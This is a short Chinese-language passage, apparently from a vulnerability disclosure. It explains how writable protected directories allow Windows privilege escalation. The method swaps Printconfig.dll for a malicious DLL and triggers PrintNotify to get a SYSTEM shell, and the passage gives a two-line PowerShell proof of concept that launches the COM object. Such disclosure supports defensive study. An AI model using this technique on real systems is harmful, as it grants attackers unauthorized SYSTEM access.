此漏洞为机器上的所有用户授予对 C:\ 驱动器的完全权限。
在受保护目录中创建用户可控文件的能力,为权限提升带来了多种可能性。其中相对简单的技术之一,是将位于 "C:\Windows\System32\spool\drivers\x64\3" 的 "Printconfig.dll" 文件替换为恶意 DLL。通过启动 PrintNotify 对象,服务将加载我们伪造的 PrintConfig.dll,从而授予我们高权限的 SYSTEM Shell。
概念验证:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)